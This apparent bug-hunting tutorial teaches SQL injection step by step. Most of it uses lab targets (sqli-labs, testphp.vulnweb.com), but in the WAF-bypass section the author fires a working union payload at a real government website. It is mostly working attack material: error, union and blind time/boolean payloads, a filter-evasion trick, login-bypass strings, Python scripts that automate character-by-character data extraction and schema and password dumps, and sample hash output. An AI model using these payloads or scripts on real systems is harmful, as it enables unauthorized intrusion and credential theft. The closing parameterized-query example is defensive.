
How to Hunt For SQL Injection learn Practically with background Concept


Welcome Hunters,

SQL (Structured Query Language) injection is a vulnerability in which user-supplied input is pasted into an SQL query and so becomes part of the query the database runs. When the application prints database errors or query results on the page, the attacker can read the result of the injected query directly; sometimes the web application displays error messages from the database complaining that the SQL query's syntax is incorrect, which is the first sign of the flaw.
Blind SQL injection is nearly identical to normal SQL injection, the only difference being the way the data is retrieved from the database. When the application is configured to show only generic error messages and never outputs query data to the web page, but has not fixed the vulnerable code, the attacker is forced to steal data by asking the database a series of true or false questions and determining the answer from the application's response (a different page, or a delay). This makes exploiting the SQL injection vulnerability slower, but not impossible.

Background Concept About SQL Injection

* How SQL Injection works

➤ In order to run malicious SQL queries against a database server an attacker must first find an input within the web application that is included inside an SQL query.

➤ For an SQL injection attack to take place, the vulnerable website needs to include user input directly within an SQL statement. An attacker can then insert a payload that will be included as part of the SQL query and run against the database server.

Note: All of this happens in the backend. With SQLi we try to retrieve data from the backend database, typically to obtain credentials related to the target website.

Injection Points For SQL Injection

 ➤ SQL Injection can be GET based
 ➤ SQL Injection can be POST based
 ➤ SQL Injection can be Header based
 ➤ SQL Injection can be Cookie based

Note: To execute your SQLi queries you first have to find some input (a URL parameter, a form field, a header or a cookie) that reaches an SQL query.

SQL Injection GET based
The attacker injects through the URL parameters.
Example- www.any.com/filename.programming?parameter=value

SQL Injection POST based
The attacker has to find an HTML form whose fields end up inside an SQL query.
Example: Signup form, login form, etc.

SQL Injection HEADER based
Here we inject through the request headers sent to the target website; the ones worth testing are those the application stores or logs, for example -
Example: Referer | User-Agent | Location | Host.

SQL Injection Cookie based
Here we inject through the cookie values sent with the request. (Get the cookies from the web browser, or from an intercepted request.)
Visit any page of the site, intercept the request with Burp Suite and put a backslash at the end of a cookie value; if you find an SQL-related error in the response, there may be SQL injection.

Note: You can use a single quote (') as well as a double quote (") to break the SQL statement. A backslash (\) works too: it escapes the closing quote of the original value, which also leaves the query unbalanced.
Example: Cookie: username:sdh@#$;

Now I hope you have a basic idea of what SQL injection is, how many types of SQL injection there are, and how to find it.
Next we will see how to fix (balance) the SQL statement, because query fixing is the second step of SQL injection after finding the injection point.

Lets Continue,

Learn SQL Injection query Fixing

➤ Identify SQL Injection vulnerability

Send each of these in the parameter and watch for a database error, a blank page or a changed response:

'
"
\

')

")


➤ Balance the query

http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select * from users where id='1' and name='xyz' {background, illustrative: the real query is not visible to us}

The quote we inject closes the string early, so the rest of the original query (here: ' and name='xyz') becomes a syntax error. Balancing means making the statement valid again with our input inside it.

How to fix

Basically you just need to put -- at the end of the vulnerable parameter, after the single or double quote, to balance the query. In MySQL -- starts a comment, but only when it is followed by whitespace, which is why it is written --+ in a URL: the + decodes to a space, whereas a bare trailing space would be stripped. Everything after the comment marker, including the dangling quote, is ignored.

http://192.168.1.103/sqli-labs-master/Less-1/?id=1'--+

select * from users where id='1' --  ' and name='xyz' {background}

In Background, what the database actually evaluates:

select * from users where id='1'

How to fix the query when the parameter is numeric (not quoted in the original query, as in Less-2): no quote is needed, only the comment

http://192.168.1.103/sqli-labs-master/Less-2/?id=1--+

Find total no of columns

order by 1 {same page}

order by 2 {same page}

...

order by n {different page, or an error}

So there are n-1 columns present in the original query.

http://192.168.1.103/sqli-labs-master/Less-1/?id=1' order by 1--+

Note:

 ➤ Order By: this keyword is used in MySQL to sort the result by a column. With a number it refers to the n-th column of the select, so the first n that fails ("Unknown column 'n' in 'order clause'") tells you the count.
In a similar manner we can use the "Group By" keyword (group by 1, group by 2, ...) to determine the number of columns in case Order By does not work or is blacklisted by a WAF (Web Application Firewall).

Find which of these n-1 columns are reflected on the page

 union all select 1,2,...,n-1

Example:

union all select 1,2,3

select * from users where id='-1' union all select 1,2,3 --  ' and name='xyz' {background}

We use id=-1 (a value that matches no row) so that the original query returns nothing and the page shows the row produced by our select; the numbers that appear on the page are the columns we can read through.

executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,2,3--+

 Execute any database query there, in place of the reflected number

Example: database()

version()

user()

Executed - http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),3--+

http://192.168.1.103/sqli-labs-master/Less-1/?id=-1' union all select 1,database(),user()--+
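To make the query-balancing, column-counting and union steps above concrete, here is an added example (not code from the original post or from sqli-labs) that rebuilds a Less-1 style page in Python on top of an in-memory SQLite database. The users table, its rows and the query template are constructed for the example and are assumptions; SQLite is used so that it runs offline, and the payloads only use syntax shared with MySQL (a comment after -- , ORDER BY with a column number, UNION ALL).

```python
import sqlite3

# Constructed sample data standing in for a target's users table (an assumption of this example).
SAMPLE_ROWS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob"), (3, "carol", "pw-carol")]


def make_db():
    """In-memory SQLite database playing the role of the backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_page(conn, user_input):
    """The vulnerable pattern: the id parameter is pasted straight into the SQL string.

    Returns ("ok", rows) or ("error", message). A Less-1 style page prints the row,
    or the database error, and that is all the attacker gets to see.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_input}' LIMIT 0,1"
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def count_columns(conn, max_columns=20):
    """ORDER BY n with increasing n: the first n that errors is one past the column count."""
    for n in range(1, max_columns + 1):
        status, _ = vulnerable_page(conn, f"1' ORDER BY {n} -- ")
        if status == "error":
            return n - 1
    raise RuntimeError("column count exceeds max_columns")


def find_reflected_columns(conn, n_columns):
    """UNION with a non-matching id (-1) so only our row comes back; markers that show up are readable."""
    markers = ",".join(str(i) for i in range(1, n_columns + 1))
    status, rows = vulnerable_page(conn, f"-1' UNION ALL SELECT {markers} -- ")
    if status != "ok" or not rows:
        return []
    return [i for i in range(1, n_columns + 1) if i in rows[0]]


def read_through_union(conn, n_columns, slot, expression):
    """Put an SQL expression in a reflected slot and return what the page shows there."""
    cells = [str(i) for i in range(1, n_columns + 1)]
    cells[slot - 1] = f"({expression})"
    status, rows = vulnerable_page(conn, f"-1' UNION ALL SELECT {','.join(cells)} -- ")
    return rows[0][slot - 1] if status == "ok" and rows else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_page(db, "1'"))        # error: the quote breaks the query
    print(vulnerable_page(db, "1' -- "))    # ok: the comment swallows the dangling quote
    cols = count_columns(db)                # 3 columns in the original select
    print(cols, find_reflected_columns(db, cols))
    print(read_through_union(db, cols, 2, "SELECT password FROM users WHERE username='alice'"))
```

The only thing the attacker controls is the string that goes into vulnerable_page; every step of the procedure above is just a different string, and the last call reads a password through the second column exactly as database() or user() are read on the lab page.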

--------------------------------------------------------------------------------------------------------------------------------------------

Situation: you are getting an error message from the database, but the output of the union statement does not appear on the page. In that case try error-based SQLi, also called double-query SQLi: the data is smuggled out inside the error message itself.

http://192.168.1.103/sqli-labs-master/Less-5/?id=-1'--+

error/double based sqli query -> hackbar->error/double->get database

--------------------------------------------------------------------------------------------------------------------------

Blind SQL Injection

Blind Boolean Based SQL Injection

The page gives no error text and no query output, only two distinguishable responses (for example the normal page versus a blank one). Compare:

and 1=1 {true}

and 1=2 {false}

and "a"="b" {false}

and database()="xyz"

We cannot guess the database name, so we extract it one character at a time:

and substring(database(),1,1)="a"

http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),1,1)="s"--+ {true: that means the first character of the current database is s}

http://192.168.1.103/sqli-labs-master/Less-8/?id=1' and substring(database(),2,1)="e"--+ {true: the second character of the current database is e}

Blind Time Based SQL Injection

When the true and false responses look identical, make the true case cost time:

' and sleep(10)--+
" and sleep(10)--+

') and sleep(10)--+

How to extract the database name for blind time based SQLi

' and sleep(10) and 1=1--+

I gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()="security"--+ and it is sleeping, that means the condition holds.

http://192.168.1.103/sqli-labs-master/Less-9/?id=1' and sleep(10) and database()="xyz"--+
(It is not sleeping for 10 sec.)

Note: whether the delay depends on the condition in that form is up to how the server evaluates the AND chain, so the reliable form puts the condition inside IF(): ' and if(substring(database(),1,1)="s",sleep(10),0)--+ sleeps only when the guess is right.
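The boolean and time based techniques above are the same loop with a different oracle, which is easiest to see in code. The following is an added example, not code from the post or from sqli-labs: it simulates a Less-8/Less-9 style page over an in-memory SQLite database (table, rows and the secret value are constructed), registers a Python sleep() function to stand in for MySQL's sleep(), and extracts a value one character at a time. The conditions use only syntax both engines accept: substr() (a synonym of substring() in MySQL), length() and CASE WHEN, the latter playing the role of MySQL's IF(). One caveat for MySQL: its default collations compare strings case-insensitively, so use BINARY in the comparison when case matters.

```python
import sqlite3
import time

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyz"
SECRET = "s3cr3t"  # constructed value the attacker is after


def make_db():
    conn = sqlite3.connect(":memory:")
    # Stand-in for MySQL's sleep(): blocks for s seconds and returns 0, like the real one.
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
    return conn


def blind_page(conn, user_input):
    """Less-8 style page: 'You are in' when the row exists, a blank page otherwise, never an error."""
    sql = f"SELECT id FROM users WHERE id='{user_input}' LIMIT 0,1"
    try:
        found = conn.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        found = False
    return "You are in" if found else ""


def boolean_oracle(conn, condition):
    """True/false is read from the page content."""
    return "You are in" in blind_page(conn, f"1' AND ({condition}) -- ")


def time_oracle(conn, condition, delay=0.3):
    """True/false is read from the response time; the page content is identical either way,
    because sleep() returns 0 and so the AND is false whether or not the guess is right."""
    payload = f"1' AND (CASE WHEN {condition} THEN sleep({delay}) ELSE 0 END) -- "
    start = time.monotonic()
    blind_page(conn, payload)
    return time.monotonic() - start >= delay * 0.8


def extract(oracle, expression, max_len=64):
    """Generic blind extraction: find the length, then test each position against CHARSET.

    oracle(condition) must return True when the SQL condition holds on the backend.
    """
    length = next(n for n in range(max_len + 1) if oracle(f"length({expression})={n}"))
    result = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(f"substr({expression},{pos},1)='{ch}'"):
                result += ch
                break
        else:
            raise ValueError(f"character at position {pos} is outside CHARSET")
    return result


# Any scalar SQL expression works here; database() would be the MySQL equivalent of this subquery.
TARGET = "(SELECT password FROM users WHERE username='admin')"

if __name__ == "__main__":
    db = make_db()
    print(extract(lambda c: boolean_oracle(db, c), TARGET))   # fast: one request per guess
    print(extract(lambda c: time_oracle(db, c), TARGET))      # slow: every hit costs `delay` seconds
```

The time oracle only pays the delay on a hit, which is why the CASE/IF form is preferable to chaining sleep() with AND: the wait is tied to the guess and nothing else.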

Exploitation of GET Based SQLi

1. Database list -

hackbar->union->database->group_concat (puts group_concat of schema_name from information_schema.schemata in the reflected column)

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195

2. Find tables of a database - dvwa

hackbar->union->tables->group_concat

guestbook
users

3. Find columns of a table - guestbook

comment_id
comment
name

4. Data of those columns

name, comment

hackbar->union->data->group_concat

name,"<------>",comment,"---->",third


Error Based Double Query Exploitation

What about the other databases? Error-based output gives one value at a time, so to fetch the remaining databases you increase the first value (the offset) of the LIMIT clause:

LIMIT 0,1 - information_schema

LIMIT 1,1 - challenges

LIMIT 2,1 - dvwa

LIMIT 3,1 - metasploit

Tables

Default tables of dvwa

LIMIT 0,1 - guestbook

LIMIT 1,1 - users

LIMIT 2,1 - you are not getting anything, that means there are only two tables

Columns for double query based (table users)

LIMIT 0,1 - user_id

LIMIT 1,1 - first_name

LIMIT 2,1 - last_name

LIMIT 3,1 - user

LIMIT 4,1 - password

LIMIT 5,1 - avatar

LIMIT 6,1 - nothing

Data of these columns
user        password
admin 5f4dcc3b5aa765d61d8327deb882cf99
Gordon e99a18c428cb38d5f260853678922e03
1337 8d3533d75ae2c3966d7e0d4fcc69216b
Pablo

Post Based SQLi

Balance the query

' -- 

Problem: --+ does not work in POST data the way it does in a URL. Instead of + use a literal space after --, or use #, which also comments out the rest of the query in MySQL.
-- or #

Find total no of columns

' order by 1 #

Find which columns are reflected

' union all select 1,2 #

Execute database query

' union all select database(),user() #

Less-12

") union all select 1,2 #

") union all select database(),user() #


Blind boolean post based SQL Injection

' OR 1=1 #

" OR 1=1 #

') OR 1=1 #

") OR 1=1 #

' OR database()="security" #

' OR substring(database(),1,1)="a" #

' OR substring(database(),1,1)="s" #
First character of the database is s

' OR substring(database(),2,1)="e" #

Second character of the database is e

Note: with OR the guess must be the only thing that can make the row match, so send it with a username that does not exist (an empty one, as here); otherwise the row matches no matter what you guess.

Blind time based

' OR sleep(10) #
" OR sleep(10) #
') OR sleep(10) #
") OR sleep(10) # {worked}

") OR sleep(10) and 1=1 #

") OR sleep(10) and substring(database(),3,1)="a" #

The application is sleeping when we fire this:

") OR sleep(10) and substring(database(),3,1)="c" #

That means the third character of the database is c



Exploitation of POST Based SQLi

Inject database queries in the reflected column

1. Database list

hackbar -> union -> database -> group_concat

' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

(0x3c62723e is the hex encoding of <br>, so each name lands on its own line when the page renders it; the hex form also needs no quotes, which matters when quotes are filtered.)

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195

2. Find tables of a database - security

' union all select (SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479),2 #

(0x7365637572697479 is "security" in hex.)

E-Mails
referrers
user-agents
users

3. Find columns of a table - users

hackbar->union->columns->group_concat

' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #

user_id
first_name
last_name
user
password
avatar
id
username
password

Note: this query filters only on TABLE_NAME, and more than one database on this server has a users table, so the output mixes the columns of dvwa.users (user_id ... avatar) with those of security.users (id, username, password). Add AND TABLE_SCHEMA=0x7365637572697479 to the WHERE clause to get only the table you mean.

4. Data of these columns - username, password

username,"<----->",password
' union all select 1,(SELECT GROUP_CONCAT(username,"<----->",password SEPARATOR 0x3c62723e) FROM security.users) #
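The four enumeration payloads above follow one pattern: a subquery over information_schema, names hex-encoded so no quotes are needed, and results joined with GROUP_CONCAT. The following added example, which is not the post's or HackBar's code, builds them from plain names. It generates MySQL payload strings only and sends nothing anywhere; it adds the TABLE_SCHEMA filter throughout so a table name that exists in several databases is not mixed up, and it takes the prefix, column count and reflected slot as parameters because those differ per target.

```python
def hex_literal(text):
    """MySQL hex string literal: 'security' -> 0x7365637572697479 (no quotes needed)."""
    return "0x" + text.encode("utf-8").hex()


SEPARATOR = hex_literal("<br>")  # 0x3c62723e: one name per line when rendered as HTML


def _union(subquery, n_columns, slot, prefix="'", comment=" #"):
    """Place subquery in reflected column `slot` of an n-column UNION, e.g. ' UNION ALL SELECT (...),2 #."""
    cells = [str(i) for i in range(1, n_columns + 1)]
    cells[slot - 1] = f"({subquery})"
    return f"{prefix} UNION ALL SELECT {','.join(cells)}{comment}"


def schemas_payload(n_columns, slot, **kw):
    q = f"SELECT GROUP_CONCAT(schema_name SEPARATOR {SEPARATOR}) FROM INFORMATION_SCHEMA.SCHEMATA"
    return _union(q, n_columns, slot, **kw)


def tables_payload(schema, n_columns, slot, **kw):
    q = (f"SELECT GROUP_CONCAT(table_name SEPARATOR {SEPARATOR}) FROM INFORMATION_SCHEMA.TABLES "
         f"WHERE TABLE_SCHEMA={hex_literal(schema)}")
    return _union(q, n_columns, slot, **kw)


def columns_payload(schema, table, n_columns, slot, **kw):
    # Filtering on TABLE_NAME alone would mix in same-named tables from other databases.
    q = (f"SELECT GROUP_CONCAT(column_name SEPARATOR {SEPARATOR}) FROM INFORMATION_SCHEMA.COLUMNS "
         f"WHERE TABLE_SCHEMA={hex_literal(schema)} AND TABLE_NAME={hex_literal(table)}")
    return _union(q, n_columns, slot, **kw)


def data_payload(schema, table, columns, n_columns, slot, **kw):
    """Dump the listed columns: 0x3a (':') between fields of a row, <br> between rows."""
    fields = ",0x3a,".join(columns)
    q = f"SELECT GROUP_CONCAT({fields} SEPARATOR {SEPARATOR}) FROM `{schema}`.`{table}`"
    return _union(q, n_columns, slot, **kw)


if __name__ == "__main__":
    # Two-column POST form with the first column reflected, as on the lab page above.
    print(schemas_payload(2, 1))
    print(tables_payload("security", 2, 1))
    print(columns_payload("security", "users", 2, 1))
    print(data_payload("security", "users", ["username", "password"], 2, 1))
    # Seven-column GET page with the third column reflected and a --+ comment instead of #.
    print(tables_payload("security", 7, 3, comment="--+"))
```

One practical limit to keep in mind: GROUP_CONCAT truncates its output at the server's group_concat_max_len (1024 bytes by default), so on a large schema you page through with LIMIT, as the error-based section does, or raise the separator list one schema at a time.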



Error Based Double Query Exploitation Post Method

How it works: GROUP BY on FLOOR(RAND(0)*2) makes MySQL try to insert the same group key twice into its temporary table, which raises "Duplicate entry '...' for key 'group_key'", and because the key is CONCAT(our subquery, FLOOR(...)) the error message carries the value we selected. LIMIT 3,1 picks the fourth schema name; change the offset to walk through the rest.

')   AND(SELECT  1  from(SELECT  COUNT(*),CONCAT((SELECT  (SELECT  (SELECT  DISTINCT  CONCAT(0x7e,0x27,CAST(schema_name  AS  CHAR),0x27,0x7e)  FROM  INFORMATION_SCHEMA.SCHEMATA  WHERE  table_schema!=DATABASE()  LIMIT  3,1))  FROM  INFORMATION_SCHEMA.TABLES  LIMIT  0,1),  FLOOR(RAND(0)*2))x  FROM  INFORMATION_SCHEMA.TABLES  GROUP  BY  x)a)  AND  1=1 #


Cookie Based SQLi

target - testphp.vulnweb.com

Balance Query

'  --

or close the quote yourself instead of commenting the rest out:

' and 'x'='x

select ... where login='test/test' and 'x'='x' ... {background, illustrative: the cookie value sent is test/test' and 'x'='x, and the injected quote pairs with the original closing quote, so the query stays valid}

-------------------------------------------
Header Based SQLi

Balance Query

' --

' and 'a'='a

select ... where referer='value' OR SLEEP(5) and 'a'='a' ... {background, illustrative: the header value sent is value' OR SLEEP(5) and 'a'='a, and a 5 second delay confirms the injection}


-------------------------------------------

WAF-Web application firewall bypassing

Earlier I tried

' order by 1 --+

When I tried

' union all select 1,2,3,4,5,6,7 --+

I got a "Not Acceptable" error

Either union is the illegal keyword, or maybe all or select is the illegal input; test them one at a time.

illegal word (word) = /*!12345word*/

This is a MySQL version-conditional comment: MySQL executes the text inside /*!NNNNN ... */ when its own version is at least N.NN.NN (here 1.23.45, so always), while a filter that treats /* ... */ as an ordinary comment never sees the keyword.

' /*!12345union*/ all select 1,2,3 --+

http://multan.gov.pk/page.php?data=-2' /*!12345union*/ all select 1,2,database(),4,5,6,7 --+

Now exploit this
all database list

hackbar->union->database->group_concat
in any reflected column number

(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)

If the WAF also blocks the function name, wrap it the same way:

' /*!12345union*/ all select 1,2,(SELECT+/*!12345GROUP_CONCAT*/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 --+

Authentication Bypassing through SQLi

Let's assume the background query of a login page looks like this (illustrative):

select * from users where username='value1' and password='value2'

value1 = ' OR 1=1 --

select * from users where username='' OR 1=1 -- ' and password='value2'

Everything after -- is a comment, OR 1=1 is true for every row, and the query returns the first user, which is usually the administrator.

value1 = 1' OR '1'='1

select * from users where username='1' OR '1'='1' and password='value2'

Here no comment is needed, because the quote we inject pairs with the original closing quote. Note that AND binds tighter than OR, so in this form the password check still applies to the OR branch; supply the same payload in the password field as well (or put it only in the password field) and the condition becomes true for every row.
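As an added example that is not from the original post, here is the assumed login query above written out in Python against an in-memory SQLite table (the accounts are constructed), once the vulnerable way and once with a parameterized query, which is the fix: the driver sends the values separately from the SQL text, so a quote in the input can never end the string literal. The same payloads are run against both, and this also applies to the "How SQL Injection works" section at the top of the page, since it is the minimal case of user input landing inside a query.

```python
import sqlite3

# Constructed accounts; the first inserted row is also the first one a plain SELECT returns.
ACCOUNTS = [("admin", "Adm1n-pass"), ("alice", "pw-alice")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ACCOUNTS)
    return conn


def login_vulnerable(conn, username, password):
    """The assumed background query with the values pasted in. Returns the logged-in user or None."""
    sql = f"SELECT username FROM users WHERE username='{username}' AND password='{password}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return None  # a real page would often leak the error text here
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row[0] if row else None


PAYLOADS = [
    ("' OR 1=1 -- ", "anything"),        # comment removes the password check entirely
    ("1' OR '1'='1", "anything"),        # username only: AND binds tighter, password still checked
    ("1' OR '1'='1", "1' OR '1'='1"),    # both fields: condition true for every row
]

if __name__ == "__main__":
    db = make_db()
    for user, pw in PAYLOADS:
        print(repr(user), repr(pw), "->", login_vulnerable(db, user, pw), "|", login_safe(db, user, pw))
    print(login_safe(db, "alice", "pw-alice"))  # the fixed version still works for real logins
```

The second payload is the one to remember when a bypass "does not work": precedence, not filtering, is what stopped it.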

So guys, this was all about SQL injection, which is one of the most critical vulnerabilities in web applications today.
I hope this will be helpful for you guys to hunt more quickly. If you find any grammar errors please let me know in the comment box; you can also send them to the mail given in the author section.
Thank you, happy hunting

Resource from Hunter 1.0: Vikash Chaudhary
